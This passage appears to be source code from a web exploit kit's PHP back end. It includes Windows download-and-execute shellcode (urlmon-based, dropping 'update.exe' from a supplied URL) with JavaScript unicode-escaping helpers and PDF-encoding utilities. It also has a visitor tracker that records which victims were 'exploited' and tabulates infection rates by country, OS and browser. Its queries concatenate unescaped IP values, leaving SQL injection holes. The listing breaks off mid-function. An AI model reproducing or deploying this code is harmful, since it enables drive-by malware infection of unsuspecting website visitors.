/include/shellcode.php:
--------------------------------------------------------------------------------
  1 | <?
  2 | 
  3 | 
  4 | include_once("util.php");
  5 | 
  6 | function uescape($s){
  7 | 	$out = "";
  8 | 	$res = strtoupper(bin2hex($s));
  9 | 	$g = round(strlen($res) / 4);
 10 | 	if ($g != (strlen($res) / 4)){
 11 | 		$res .= "00";
 12 | 	}
 13 | 	for ($i = 0; $i < strlen($res); $i+=4){
 14 | 		$out .= "\u" . substr($res, $i+2, 2) . substr($res, $i, 2);
 15 | 	}
 16 | 	return $out;
 17 | }
 18 | 
 19 | function shellcode_dl_exec_hex($url)
 20 | {
 21 | 	$shellcode = str_to_hex(uescape(shellcode_dl_exec($url)));
 22 | 	return $shellcode;
 23 | }
 24 | 
 25 | function shellcode_dl_exec_js($url)
 26 | {
 27 | 	$shellcode = uescape(shellcode_dl_exec($url));
 28 | 	return $shellcode;
 29 | }
 30 | 
 31 | function shellcode_dl_exec($url){
 32 | 	
 33 | 
 34 | 	$shellcode = "" .	
 35 | 	"\xEB\x46\x5F\x31\xC9\x83\xE9\x01\x89\xFE\x30\xC0\x2C\x01\xF2\xAE".
 36 | 	"\xFE\x47\xFF\x89\xFB\x30\xC0\x2C\x01\xF2\xAE\xFE\x47\xFF\x89\xFD".
 37 | 	"\xF2\xAE\xFE\x47\xFF\xEB\x71\x60\x31\xC9\x64\x8B\x71\x30\x8B\x76".
 38 | 	"\x0C\x8B\x76\x1C\x8B\x5E\x08\x8B\x56\x20\x8B\x36\x66\x39\x4A\x18".
 39 | 	"\x75\xF2\x89\x5C\x24\x1C\x61\xC3\xEB\x5B\x60\x8B\x6C\x24\x24\x8B".
 40 | 	"\x45\x3C\x8B\x54\x05\x78\x01\xEA\x8B\x4A\x18\x8B\x5A\x20\x01\xEB".
 41 | 	"\xE3\x34\x49\x8B\x34\x8B\x01\xEE\x31\xFF\x31\xC0\xFC\xAC\x84\xC0".
 42 | 	"\x74\x07\xC1\xCF\x12\x01\xC7\xEB\xF4\x3B\x7C\x24\x28\x75\xE1\x8B".
 43 | 	"\x5A\x24\x01\xEB\x66\x8B\x0C\x4B\x8B\x5A\x1C\x01\xEB\x8B\x04\x8B".
 44 | 	"\x01\xE8\x89\x44\x24\x1C\x61\xC3\xEB\x54\x31\xD2\x52\x52\x53\x55".
 45 | 	"\x52\xFF\xD0\xEB\x1A\xEB\x5D\xE8\x7B\xFF\xFF\xFF\xBA\xE7\xBA\x8B".
 46 | 	"\xC4\x52\x50\xE8\x92\xFF\xFF\xFF\x31\xD2\x52\xFF\xD0\xEB\x2D\xE8".
 47 | 	"\x63\xFF\xFF\xFF\xBA\xAA\x6E\x8A\xF3\x52\x50\xE8\x7A\xFF\xFF\xFF".
 48 | 	"\x31\xD2\x83\xC2\xFF\x83\xEA\xFA\x52\x53\xFF\xD0\xEB\xC9\xBA\x47".
 49 | 	"\x7D\xC8\xA0\x52\x50\xE8\x60\xFF\xFF\xFF\xEB\xAE\xEB\x5D\xE8\x34".
 50 | 	"\xFF\xFF\xFF\xBA\x12\xCE\x1A\x09\x52\x50\xE8\x4B\xFF\xFF\xFF\x56".
 51 | 	"\xFF\xD0\xEB\xDA\xE8\xF9\xFE\xFF\xFF\x75\x72\x6C\x6D\x6F\x6E\x2E".
 52 | 	"\x64\x6C\x6C\xFF" . "../update.exe" . "\xFF".  $url . 
 53 | 	"\xFF\xCD\x03";
 54 | 
 55 | 
 56 | 	//"\xeb\x42\x5f\xb9\xff\xff\xff\xff\x89\xfe\xb0\xff\xf2\xae\xfe\x47".
 57 | 	//"\xff\x89\xfb\xb0\xff\xf2\xae\xfe\x47\xff\x89\xfd\xf2\xae\xfe\x47".
 58 | 	//"\xff\xeb\x74\x60\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c".
 59 | 	//"\x8b\x5e\x08\x8b\x56\x20\x8b\x36\x66\x39\x4a\x18\x75\xf2\x89\x5c".
 60 | 	//"\x24\x1c\x61\xc3\xeb\x5e\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54".
 61 | 	//"\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x37\x49\x8b".
 62 | 	//"\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x0a\xc1\xcf".
 63 | 	//"\x0f\x01\xc7\xe9\xf1\xff\xff\xff\x3b\x7c\x24\x28\x75\xde\x8b\x5a".
 64 | 	//"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01".
 65 | 	//"\xe8\x89\x44\x24\x1c\x61\xc3\xeb\x5a\x31\xd2\x52\x52\x53\x55\x52".
 66 | 	//"\xff\xd0\xeb\x1a\xeb\x63\xe8\x78\xff\xff\xff\xba\xf8\x99\x3f\x3c".
 67 | 	//"\x52\x50\xe8\x8f\xff\xff\xff\x31\xd2\x52\xff\xd0\xeb\x33\xe8\x60".
 68 | 	//"\xff\xff\xff\xba\xe3\x1e\x12\x10\x52\x50\xe8\x77\xff\xff\xff\x31".
 69 | 	//"\xd2\x81\xc2\xff\xff\xff\xff\x81\xea\xfa\xff\xff\xff\x52\x53\xff".
 70 | 	//"\xd0\xeb\xc3\xba\x33\x9d\x5e\x72\x52\x50\xe8\x57\xff\xff\xff\xeb".
 71 | 	//"\xa8\xeb\x5a\xe8\x2b\xff\xff\xff\xba\x6c\x43\x3c\x58\x52\x50\xe8".
 72 | 	//"\x42\xff\xff\xff\x56\xff\xd0\xeb\xda\xe8\xf4\xfe\xff\xff\x75\x72".
 73 | 	//"\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\xff" . "update.exe" . "\xff" . $url . "\xff\xcd\x03";
 74 | 	
 75 | 	//"\xeb\x42\x5f\xb9\xff\xff\xff\xff\x89\xfe\xb0\xff\xf2\xae\xfe\x47" .
 76 | 	//"\xff\x89\xfb\xb0\xff\xf2\xae\xfe\x47\xff\x89\xfd\xf2\xae\xfe\x47" .
 77 | 	//"\xff\xeb\x74\x60\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c" .
 78 | 	//"\x8b\x5e\x08\x8b\x56\x20\x8b\x36\x66\x39\x4a\x18\x75\xf2\x89\x5c" .
 79 | 	//"\x24\x1c\x61\xc3\xeb\x7c\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54" .
 80 | 	//"\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x37\x49\x8b" .
 81 | 	//"\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x0a\xc1\xcf" .
 82 | 	//"\x0d\x01\xc7\xe9\xf1\xff\xff\xff\x3b\x7c\x24\x28\x75\xde\x8b\x5a" .
 83 | 	//"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" .
 84 | 	//"\xe8\x89\x44\x24\x1c\x61\xc3\xe8\x87\xff\xff\xff\xba\x8e\x4e\x0e" .
 85 | 	//"\xec\x52\x50\xe8\x9e\xff\xff\xff\x56\xff\xd0\xba\x36\x1a\x2f\x70" .
 86 | 	//"\x52\x50\xe8\x8f\xff\xff\xff\x31\xd2\x52\x52\x53\x55\x52\xff\xd0" .
 87 | 	//"\xeb\x1a\xeb\x3d\xe8\x5a\xff\xff\xff\xba\x7e\xd8\xe2\x73\x52\x50" .
 88 | 	//"\xe8\x71\xff\xff\xff\x31\xd2\x52\xff\xd0\xeb\x69\xe8\x42\xff\xff" .
 89 | 	//"\xff\xba\x98\xfe\x8a\x0e\x52\x50\xe8\x59\xff\xff\xff\x31\xd2\x81" .
 90 | 	//"\xc2\xff\xff\xff\xff\x81\xea\xfa\xff\xff\xff\x52\x53\xff\xd0\xeb" .
 91 | 	//"\xc3\xe8\xfc\xfe\xff\xff\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c" .
 92 | 	//"\xff" . $drop_filename . "\xff" . $url . "\xff\xcd\x03";
 93 | 	//"\xeb\x72\x60\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b".
 94 | 	//"\x5e\x08\x8b\x56\x20\x8b\x36\x66\x39\x4a\x18\x75\xf2\x89\x5c\x24".
 95 | 	//"\x1c\x61\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78\x01".
 96 | 	//"\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x37\x49\x8b\x34\x8b\x01".
 97 | 	//"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x0a\xc1\xcf\x0d\x01\xc7".
 98 | 	//"\xe9\xf1\xff\xff\xff\x3b\x7c\x24\x28\x75\xde\x8b\x5a\x24\x01\xeb".
 99 | 	//"\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44".
100 | 	//"\x24\x1c\x61\xc3\xeb\x6d\x5f\xb9\xff\xff\xff\xff\x89\xfe\xb0\xff".
101 | 	//"\xf2\xae\xfe\x47\xff\x89\xfb\xb0\xff\xf2\xae\xfe\x47\xff\x89\xfd".
102 | 	//"\xf2\xae\xfe\x47\xff\xe8\x68\xff\xff\xff\xba\x8e\x4e\x0e\xec\x52".
103 | 	//"\x50\xe8\x7d\xff\xff\xff\x56\xff\xd0\xba\x36\x1a\x2f\x70\x52\x50".
104 | 	//"\xe8\x6e\xff\xff\xff\x31\xd2\x52\x52\x53\x55\x52\xff\xd0\xe8\x3f".
105 | 	//"\xff\xff\xff\xba\x98\xfe\x8a\x0e\x52\x50\xe8\x54\xff\xff\xff\x31".
106 | 	//"\xd2\x81\xc2\xff\xff\xff\xff\x81\xea\xfa\xff\xff\xff\x52\x53\xff".
107 | 	//"\xd0\xeb\x02\xeb\x16\xe8\x18\xff\xff\xff\xba\x7e\xd8\xe2\x73\x52".
108 | 	//"\x50\xe8\x2d\xff\xff\xff\x31\xd2\x52\xff\xd0\xe8\x76\xff\xff\xff".
109 | 	//"\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\xff\x75\x70\x2e\x65\x78".
110 | 	//"\x65\xff" . $url . "\xff";
111 | 
112 | 	return $shellcode;
113 | 	
114 | }
115 | 
116 | ?>
117 | 


--------------------------------------------------------------------------------
/include/sql.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 |   function mqesc($mixed)
 4 |   {
 5 |     if(is_array($buf))
 6 |     {
 7 |       reset($mixed);
 8 | 
 9 |       while(list($key,$value) = each($mixed))
10 |         $mixed[$key] = mysql_real_escape_string($value);
11 |     }
12 |     else
13 |       $mixed = mysql_real_escape_string($mixed);
14 |     return $mixed;
15 |   }
16 | 
17 |   class CSQL {
18 |     var $sqlSettings;
19 |     var $theQuery;
20 |     var $link;
21 | 
22 |     function CSQL(&$settings) {
23 |       $this->sqlSettings  =& $GLOBALS['sqlSettings'];
24 |       $opened = false;
25 |     }
26 | 
27 |     function open() {
28 |       if(!function_exists("mysql_connect")) return false;
29 | 
30 |       $this->link = mysql_connect($this->sqlSettings['dbHost'], $this->sqlSettings['dbUsername'], $this->sqlSettings['dbPassword']) or die("Error: Cannot connect to the database.");
31 | 
32 |       mysql_select_db($this->sqlSettings['dbName']) or die("Error: Cannot connect to " . $this->sqlSettings['dbName'] . ".");
33 | 
34 |       $opened = true;
35 | 
36 |       return $opened;
37 |     }
38 | 
39 |     function close() {
40 |       if(!function_exists("mysql_close")) return false;
41 | 
42 |       mysql_close($this->link);
43 | 
44 |       $opened = false;
45 | 
46 |       return $opened;
47 |     }
48 |   }
49 | 
50 |   class CQuery {
51 |     function query($query) {
52 |       $this->theQuery = $query;
53 | 
54 |       if(!function_exists("mysql_query")) return false;
55 |       return mysql_query($query);
56 |     }
57 | 
58 |     function fetcharray($result) {
59 |       if(!function_exists("mysql_fetch_array")) return false;
60 |       return mysql_fetch_array($result);
61 |     }
62 | 
63 |     function fetchrow($result) {
64 |       if(!function_exists("mysql_fetch_row")) return false;
65 |       return mysql_fetch_row($result);
66 |     }
67 | 
68 |     function fetchassoc($result) {
69 |       if(!function_exists("mysql_fetch_assoc")) return false;
70 |       return mysql_fetch_assoc($result);
71 |     }
72 | 
73 |     function numrows($result) {
74 |       if(!function_exists("mysql_num_rows")) return false;
75 |       return mysql_num_rows($result);
76 |     }
77 | 
78 |     function freeresult($result) {
79 |       if(!function_exists("mysql_free_result")) return false;
80 |       return mysql_free_result($result);
81 |     }
82 |   }
83 | ?>
84 | 


--------------------------------------------------------------------------------
/include/util.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | include("ascii85.php");
 4 | 
 5 | function str_to_hex($string)
 6 | {
 7 |     $hex='';
 8 |     for ($i=0; $i < strlen($string); $i++)
 9 |     {
10 |         $hex .= str_pad(dechex(ord($string[$i])), 2, '0', STR_PAD_LEFT);
11 |     }
12 |     return $hex;
13 | }
14 | 
15 | function pdf_ASCIIHexEncode($string){
16 | 	return str_to_hex($string) . ">";
17 | }
18 | function pdf_FlateEncode($string){
19 | 	return gzcompress($string);
20 | }
21 | function pdf_ASCII85Encode($string){
22 | 	$ascii85 = new ASCII85();
23 | 	return $ascii85->encode($string);
24 | }
25 | function RandomNonASCIIString($count){
26 | 		$result = "";
27 | 		for($i = 0; $i < $count; $i++){
28 | 			$result  = $result . chr(rand(128, 255));
29 | 		}
30 | 		return $result;
31 | }
32 | 
33 | function ioDef($id){
34 | 		return $id . " 0 obj\r\n";
35 | }
36 | 
37 | function ioRef($id){
38 | 		return $id . " 0 R";
39 | }
40 | 
41 | 
42 | ?>
43 | 


--------------------------------------------------------------------------------
/include/visitors.php:
--------------------------------------------------------------------------------
  1 | <?
  2 | 
  3 | 
  4 | 	require_once('ip2c.php');
  5 | 	class CVisitors {
  6 | 		var $sqlSettings;
  7 | 		var $sql;
  8 | 		
  9 | 		var $OSList = array
 10 | 		(
 11 | 			'Windows 3.11' => 'Win16',
 12 | 			'Windows 95' => '(Windows 95)|(Win95)|(Windows_95)',
 13 | 			'Windows 98' => '(Windows 98)|(Win98)',
 14 | 			'Windows 2000' => '(Windows NT 5.0)|(Windows 2000)',
 15 | 			'Windows XP' => '(Windows NT 5.1)|(Windows XP)',
 16 | 			'Windows Server 2003' => '(Windows NT 5.2)',
 17 | 			'Windows Vista' => '(Windows NT 6.0)',
 18 | 			'Windows 7' => '(Windows NT 7.0)|(Windows NT 6.1)',
 19 | 			'Windows NT 4.0' => '(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)',
 20 | 			'Windows ME' => 'Windows ME',
 21 | 			'Open BSD' => 'OpenBSD',
 22 | 			'Sun OS' => 'SunOS',
 23 | 			'Linux' => '(Linux)|(X11)',
 24 | 			'Mac OS' => '(Mac_PowerPC)|(Macintosh)',
 25 | 			'QNX' => 'QNX',
 26 | 			'BeOS' => 'BeOS',
 27 | 			'OS/2' => 'OS/2',
 28 | 			'Search Bot'=>'(nuhk)|(Googlebot)|(Yammybot)|(Openbot)|(Slurp)|(MSNBot)|(Ask Jeeves/Teoma)|(ia_archiver)'
 29 | 		);
 30 | 
 31 | 		var $BrowserList = array
 32 | 		(
 33 | 			'Internet Explorer' => 'msie',
 34 | 			'Mozilla Firefox' => 'firefox',
 35 | 			'Google Chrome' => 'chrome',	
 36 | 			'Apple Safari' => 'safari',
 37 | 			'Opera' => 'opera'
 38 | 			
 39 | 		);
 40 | 		
 41 | 		function CVisitors(&$_sql, &$_sqlSettings) {
 42 | 		  $this->sql = &$_sql;
 43 | 		  $this->sqlSettings = &$_sqlSettings;
 44 | 		}
 45 | 		
 46 | 				
 47 | 		function getIpAddr()
 48 | 		{			
 49 | 			$ip = $_SERVER['REMOTE_ADDR'];			
 50 | 			return $ip;
 51 | 		}
 52 | 		
 53 | 		function getIpAddrCountry($ipAddress)
 54 | 		{			
 55 | 			$ip2c = new ip2country("include/ip-to-country.bin");
 56 | 			$res = $ip2c->get_country($ipAddress);
 57 | 			if ($res == false){
 58 | 			  return "Unknown";
 59 | 			}else{			  
 60 | 			  $country = $res['name'];
 61 | 			  if($country == ""){
 62 | 				$country = "Unknown";
 63 | 			  }
 64 | 			  return $country ;
 65 | 			}
 66 | 		}
 67 | 		
 68 | 	function checkVisitor($userAgent, $ipAddress, $country)
 69 | 		{
 70 | 			
 71 | 			$cq = new CQuery();
 72 | 			
 73 | 			$sql_result = mysql_query("SELECT 1 FROM " . $this->sqlSettings['tableVisitorsList'] . " LIMIT 0");
 74 | 			if (!$sql_result)
 75 | 			{
 76 | 				echo "Error: Database table doesn't exist. Run install.php from the directory.";
 77 | 				return;
 78 | 			}
 79 | 			
 80 | 			$cq = new CQuery();
 81 | 			
 82 | 			$sql_result = mysql_query('SELECT ipAddress FROM ' . $this->sqlSettings['tableVisitorsList'] . ' WHERE ipAddress = \'' . $ipAddress . '\''); 
 83 | 			$sql_rows = $cq->fetcharray($sql_result);
 84 | 			mysql_free_result($sql_result);
 85 | 			
 86 | 			if($sql_rows) { 
 87 | 				if($this->getIfVisitorExploitedByIp($ipAddress) == 1)
 88 | 				{
 89 | 					return true;
 90 | 				} else {
 91 | 					return false;
 92 | 				}
 93 | 			} else {
 94 | 				$this->addUniqueVisitor($userAgent, $ipAddress, $country);
 95 | 				return false;
 96 | 			}
 97 | 		}
 98 | 		
 99 | 		function getIfVisitorExploitedByIp($ipAddress) 
100 | 		{
101 | 			$cq = new CQuery();
102 | 			$sql_result = $cq->query('SELECT * FROM ' . $this->sqlSettings['tableVisitorsList'] . ' WHERE ipAddress = \'' . $ipAddress . '\'');
103 | 			$row = $cq->fetchassoc($sql_result);
104 | 			mysql_free_result($sql_result);
105 | 			return $row['exploited'];
106 | 		}
107 | 		
108 | 		function setVisitorExploited($ipAddress, $exploit)
109 | 		{
110 | 			$cq = new CQuery();
111 | 			$string = 'UPDATE  ' . $this->sqlSettings['tableVisitorsList'] . ' set exploited=1, exploit="' .  mysql_real_escape_string($exploit) . '" WHERE ipAddress = "' . $ipAddress . '";';
112 | 			$sql_result = $cq->query($string);			
113 | 			return;
114 | 		}
115 | 		
116 | 		function clearVisitors()
117 | 		{
118 | 			$cq = new CQuery();
119 | 			$sql_result = $cq->query('delete from ' . $this->sqlSettings['tableVisitorsList']);
120 | 			return;
121 | 		}
122 | 
123 | 		function addUniqueVisitor($userAgent, $ipAddress, $country)
124 | 		{
125 | 			
126 | 			$referrer = $_GET["referrer"];
127 | 			if(!isset($referrer) || $referrer==""){
128 | 				$referrer = getenv('HTTP_REFERER');
129 | 			}
130 | 			
131 | 			$referrer = htmlentities($referrer);
132 | 
133 | 			$cq = new CQuery();
134 | 			$query = "INSERT INTO `" . $this->sqlSettings['dbName'] . "`.`" . $this->sqlSettings['tableVisitorsList'] . "` (
135 | 				`id` ,
136 | 				`ipAddress` ,
137 | 				`userAgent` ,
138 | 				`country` ,
139 | 				`referrer`,
140 | 				`exploited`
141 | 				)
142 | 				VALUES (
143 | 				NULL , '" . mysql_real_escape_string($ipAddress) . "', '" . mysql_real_escape_string($userAgent) . "', '" . mysql_real_escape_string($country) . "', '" . mysql_real_escape_string($referrer) . "', '0'
144 | 			);";			
145 | 			$sql_result = $cq->query($query);
146 | 		}
147 | 		
148 | 		function getUniqueVisitorsCount()
149 | 		{
150 | 			$cq = new CQuery();
151 | 			$sql_result = $cq->query("SELECT * FROM " . $this->sqlSettings['tableVisitorsList']);
152 | 			$visitorsCount = $cq->numrows($sql_result);
153 | 			return $visitorsCount;
154 | 		}
155 | 
156 | 		function getVisitorsExploitedCount()
157 | 		{
158 | 			$cq = new CQuery();
159 | 			$sql_result = mysql_query('SELECT * FROM ' . $this->sqlSettings['tableVisitorsList'] . ' WHERE exploited = \'1\'');
160 | 			$exploitedVisitorsCount = $cq->numrows($sql_result);
161 | 			return $exploitedVisitorsCount;
162 | 		}
163 | 		
164 | 		function showExploitsTable()
165 | 		{
166 | 			$cq = new CQuery();
167 | 			$sql_result = mysql_query('SELECT * FROM `' . $this->sqlSettings['tableVisitorsList'] . "`");
168 | 			$exploitStack = array();
169 | 			while($row = $cq->fetchassoc($sql_result))
170 | 			{
171 | 				if($row['exploit'])
172 | 					$exploitStack[$row['exploit']] = $exploitStack[$row['exploit']] + 1;
173 | 			}
174 | 			echo("<table>
175 | 					<tr>
176 | 						<td>Exploit</td>
177 | 						<td>#</td>
178 | 						<td>%</td>
179 | 					</tr>
180 | 				");
181 | 			$countVisitors = $this->getUniqueVisitorsCount();			
182 | 			foreach($exploitStack as $cKey=>$cValue) {				
183 | 				
184 | 				if($cValue)
185 | 				{
186 | 					if($countVisitors == 0 || $cValue == 0){
187 | 						$exploitedPercentage = 0;
188 | 					}else{
189 | 						$exploitedPercentage = round($cValue * 100 / $countVisitors, 2);
190 | 					}
191 | 					echo("<tr>");
192 | 					echo("<td>" . $cKey . "</td>" . "<td>" . $cValue . "</td><td>" . $exploitedPercentage . "%</td>");
193 | 					echo("</tr>");
194 | 				}
195 | 			}
196 | 			echo("</table>");
197 | 		}		
198 | 
199 | 		function showOSInformation()
200 | 		{	
201 | 			$cq = new CQuery();
202 | 			$sql_result = mysql_query('SELECT * FROM `' . $this->sqlSettings['tableVisitorsList'] . "`");
203 | 			$OSStack = array("Unknown" => 0);
204 | 			$OSExploitedStack = array("Unknown" => 0);
205 | 			$identifiedOSCount = 0;
206 | 			while($row = $cq->fetchassoc($sql_result))
207 | 			{
208 | 				foreach($this->OSList as $CurrOS=>$Match)
209 | 				{
210 | 					if (eregi($Match, $row['userAgent']))
211 | 					{
212 | 						if($this->getIfKeyExistsInArray($CurrOS, $OSStack))
213 | 						{
214 | 							$OSStack[$CurrOS] = $OSStack[$CurrOS] + 1;
215 | 							if($row['exploited'])
216 | 								$OSExploitedStack[$CurrOS] = $OSExploitedStack[$CurrOS] + 1;
217 | 						}
218 | 						else
219 | 						{
220 | 							array_push($OSStack, array($CurrOS => 0));
221 | 							array_push($OSExploitedStack, array($CurrOS => 0));
222 | 							if($row['exploited'])
223 | 								$OSExploitedStack[$CurrOS] = $OSExploitedStack[$CurrOS] + 1;
224 | 							$OSStack[$CurrOS] = $OSStack[$CurrOS] + 1;
225 | 						}
226 | 						$identifiedOSCount = $identifiedOSCount + 1;
227 | 						break;
228 | 					}
229 | 				}
230 | 			}
231 | 			$OSStack["Unknown"] = $this->getUniqueVisitorsCount() - $identifiedOSCount;
232 | 			arsort($OSStack);
233 | 			echo("<table>
234 | 					<tr>
235 | 						<td>Operating System</td>
236 | 						<td>Total</td>
237 | 						<td>Exploited</td>
238 | 						<td>%</td>
239 | 					</tr>
240 | 				");
241 | 			$nOSStack = array();
242 | 			$nOSStackCount = array();
243 | 			foreach($OSStack as $cKey=>$cValue) {
244 | 				if($cValue)
245 | 				{
246 | 					if($cValue == 0 || $OSExploitedStack[$cKey] == 0){
247 | 						$OSExploitedStack[$cKey] = 0;
248 | 						$exploitedPercentage = 0;
249 | 					}else{
250 | 						$exploitedPercentage = round($OSExploitedStack[$cKey] * 100 / $cValue, 2);
251 | 					}
252 | 					array_push($nOSStack, $cKey);
253 | 					array_push($nOSStackCount, $cValue);
254 | 					echo("<tr>");
255 | 					echo("<td>" . $cKey . "</td>" . "<td>". $cValue . "</td>" . "<td>". $OSExploitedStack[$cKey] . "</td><td>" . $exploitedPercentage . "%</td></tr>");
256 | 				}
257 | 			}
258 | 			echo("</table>");
259 | 
260 | 		}
261 | 		
262 | 		function showBrowserInformation()
263 | 		{	
264 | 			$cq = new CQuery();
265 | 			$sql_result = mysql_query('SELECT * FROM `' . $this->sqlSettings['tableVisitorsList'] . "`");
266 | 			$OSStack = array("Unknown" => 0);
267 | 			$OSExploitedStack = array("Unknown" => 0);
268 | 			$identifiedOSCount = 0;
269 | 			while($row = $cq->fetchassoc($sql_result))
270 | 			{
271 | 				foreach($this->BrowserList as $CurrOS=>$Match)
272 | 				{
273 | 					if (eregi($Match, $row['userAgent']))
274 | 					{
275 | 						if($this->getIfKeyExistsInArray($CurrOS, $OSStack))
276 | 						{
277 | 							$OSStack[$CurrOS] = $OSStack[$CurrOS] + 1;
278 | 							if($row['exploited'])
279 | 								$OSExploitedStack[$CurrOS] = $OSExploitedStack[$CurrOS] + 1;
280 | 						}
281 | 						else
282 | 						{
283 | 							array_push($OSStack, array($CurrOS => 0));
284 | 							array_push($OSExploitedStack, array($CurrOS => 0));
285 | 							if($row['exploited'])
286 | 								$OSExploitedStack[$CurrOS] = $OSExploitedStack[$CurrOS] + 1;
287 | 							$OSStack[$CurrOS] = $OSStack[$CurrOS] + 1;
288 | 						}
289 | 						$identifiedOSCount = $identifiedOSCount + 1;
290 | 						break;
291 | 					}
292 | 				}
293 | 			}
294 | 			$OSStack["Unknown"] = $this->getUniqueVisitorsCount() - $identifiedOSCount;
295 | 			arsort($OSStack);
296 | 			echo("<table>
297 | 					<tr>
298 | 						<td>Browser</td>
299 | 						<td>Total</td>
300 | 						<td>Exploited</td>
301 | 						<td>%</td>
302 | 					</tr>
303 | 				");
304 | 			$nOSStack = array();
305 | 			$nOSStackCount = array();
306 | 			foreach($OSStack as $cKey=>$cValue) {
307 | 				if($cValue)
308 | 				{
309 | 					if($cValue == 0 || $OSExploitedStack[$cKey] == 0){
310 | 						$OSExploitedStack[$cKey] = 0;
311 | 						$exploitedPercentage = 0;
312 | 					}else{
313 | 						$exploitedPercentage = round($OSExploitedStack[$cKey] * 100 / $cValue, 2);
314 | 					}
315 | 					array_push($nOSStack, $cKey);
316 | 					array_push($nOSStackCount, $cValue);
317 | 					echo("<tr>");
318 | 					echo("<td>" . $cKey . "</td>" . "<td>". $cValue . "</td>" . "<td>". $OSExploitedStack[$cKey] . "</td><td>" . $exploitedPercentage . "%</td></tr>");
319 | 				}
320 | 			}
321 | 			echo("</table>");
322 | 
323 | 		}
324 | 
325 | 		function getIfKeyExistsInArray($key, $array)
326 | 		{
327 | 			foreach($array as $tkey=>$value)
328 | 				{
329 | 					if($tkey = $key)
330 | 					{
331 | 						return true;
332 | 					}
333 | 				}
334 | 			return false;
335 | 		}
336 | 		
337 | 		function showVisitorsCountryTop()
338 | 		{
339 | 			$cq = new CQuery();
340 | 			$sql_result = mysql_query('SELECT * FROM `' . $this->sqlSettings['tableVisitorsList'] . "`");
341 | 			$countryStack = array();
342 | 			$countryStackCount = array();
343 | 			$countryStackExploitedCount = array();
344 | 			while($row = $cq->fetchassoc($sql_result))
345 | 			{
346 | 				if($this->getElementExistsInArray($row['country'],$countryStack))
347 | 				{
348 | 					$countryIndex = $this->getElementIndexInArray($row['country'], $countryStack);
349 | 					$countryStackCount[$countryIndex] = $countryStackCount[$countryIndex] + 1;
350 | 					if($row['exploited'])
351 | 					{
352 | 						$countryStackExploitedCount[$countryIndex] = $countryStackExploitedCount[$countryIndex] + 1;
353 | 					}
354 | 				}
355 | 				else
356 | 				{
357 | 					array_push($countryStack, $row['country']);
358 | 					array_push($countryStackCount, 1);
359 | 					if($row['exploited'])
360 | 					{
361 | 						array_push($countryStackExploitedCount, 1);
362 | 					}
363 | 					else
364 | 					{
365 | 						array_push($countryStackExploitedCount, 0);
366 | 					}
367 | 				}
368 | 			}
369 | 
370 | 			arsort($countryStackCount);
371 | 			
372 | 			$this->sortArrayByArray($countryStack, $countryStackCount);
373 | 			$display = 5;
374 | 			$displayCount = 0;
375 | 			$otherCountriesCount = 0;
376 | 			$otherCountriesVisitorsCount = 0;
377 | 			$otherCountriesExploitedCount = 0;
378 | 			$nCountryStack = array();
379 | 			$nCountryStackCount = array();
380 | 			$nCountryStackExploitedCount = array();
381 | 			$nCountryStackExploitedCountries = array();
382 | 			$row = $countryStackCount;
383 | 			
384 | 			echo(
385 | 				"<table>
386 | 					<tr>
387 | 						<td>Country</td>
388 | 						<td style=\"width: 60px;\">Total</td>
389 | 						<td style=\"width: 60px;\">Exploited</td>
390 | 						<td style=\"width: 60px;\">%</td>
391 | 					</tr>"
392 | 			);
393 | 			
394 | 			foreach($row as $countryCount){
395 | 				$kindex = key($row);
396 | 				if($displayCount == $display)
397 | 				{
398 | 					$otherCountriesVisitorsCount = $otherCountriesVisitorsCount + $countryCount;
399 | 					$otherCountriesCount = $otherCountriesCount + 1;
400 | 					$otherCountriesExploitedCount = $otherCountriesExploitedCount + $countryStackExploitedCount[$kindex];
401 | 				}
402 | 				else
403 | 				{
404 | 					$tempPorcentage = $countryStackExploitedCount[$kindex] * 100 / $countryCount;
405 | 					echo("
406 | 							<tr>								
407 | 								<td>{$countryStack[$kindex]}</td>
408 | 								<td>{$countryCount}</td>
409 | 								<td>{$countryStackExploitedCount[$kindex]}</td>
410 | 								<td>" . round($tempPorcentage, 2) . "%</td>
411 | 							</tr>"
412 | 					);
413 | 					array_push($nCountryStack, $countryStack[$kindex]);
414 | 					array_push($nCountryStackCount, $countryCount);
415 | 					
416 | 					if($countryStackExploitedCount[$kindex])
417 | 					{
418 | 						array_push($nCountryStackExploitedCount, $countryStackExploitedCount[$kindex]);
419 | 						array_push($nCountryStackExploitedCountries, $countryStack[$kindex]);
420 | 					}
421 | 					
422 | 					$displayCount = $displayCount + 1;
423 | 				}
424 | 				next($row);
425 | 			} 
426 | 			
427 | 			if($otherCountriesVisitorsCount)
428 | 			{
429 | 				array_push($nCountryStack, "Others");
430 | 				array_push($nCountryStackCount, $otherCountriesVisitorsCount);
431 | 				array_push($nCountryStackExploitedCountries, "Others");
432 | 				array_push($nCountryStackExploitedCount, $otherCountriesExploitedCount);
433 | 			}
434 | 			
435 | 			if($otherCountriesVisitorsCount != 0)
436 | 			{
